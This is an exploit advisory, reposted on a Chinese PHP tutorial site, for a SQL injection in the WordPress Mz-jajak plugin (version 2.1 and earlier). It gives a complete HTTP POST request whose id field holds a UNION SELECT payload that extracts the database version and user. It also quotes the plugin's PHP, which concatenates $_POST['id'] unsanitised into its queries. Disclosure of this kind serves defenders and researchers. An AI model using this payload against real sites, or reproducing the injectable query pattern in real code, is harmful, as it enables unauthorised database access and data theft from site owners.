来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: WordPress Mz-jajak plugin = 2.1 SQL Injection Vulnerability作者: StRoNiX www.2cto.com hacker@hotmail.rs下载地址: http://downloads.wordpress.org/plugin/mz-jajak.zip影响版本: 2.1......
|
标题: WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability
作者: StRoNiX www.2cto.com hacker@hotmail.rs 下载地址: http://downloads.wordpress.org/plugin/mz-jajak.zip 影响版本: 2.1 (已测) --------------- 测试证明 (POST data) --------------- POST /index.php HTTP/1.1 User-Agent: Mozilla Host: example.com Accept: */* Referer: http:// www.2cto.com /?page_id=9 Connection: Keep-Alive Content-Length: 111 Content-Type: application/x-www-form-urlencoded answer=1&formvote=Y&id=1 AND 1=0 UNION ALL SELECT 1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15--+&x=10&y=12 --------------- 缺陷相关代码 --------------- $id=$_POST['id']; ... $query = $wpdb->query("UPDATE " . $table_name . " SET ".$answert."=".$answert."+1 WHERE id=".$id); } $rows = $wpdb->get_results("SELECT * FROM " . $table_name . " WHERE id=".$id); Thanks, ~StRoNiX |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
